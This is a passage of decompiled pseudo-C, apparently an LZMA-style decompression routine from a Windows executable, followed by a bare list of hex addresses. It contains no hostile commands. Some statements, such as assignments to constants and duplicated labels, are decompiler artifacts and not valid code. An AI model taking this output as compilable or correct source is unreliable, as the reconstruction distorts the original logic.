												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004062eb
0x004062eb
0x004062ef
0x00406310
0x00406317
0x0040631d
0x00406323
0x00406335
0x0040633b
0x00406340
0x00000000
0x004062f1
0x004062f7
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
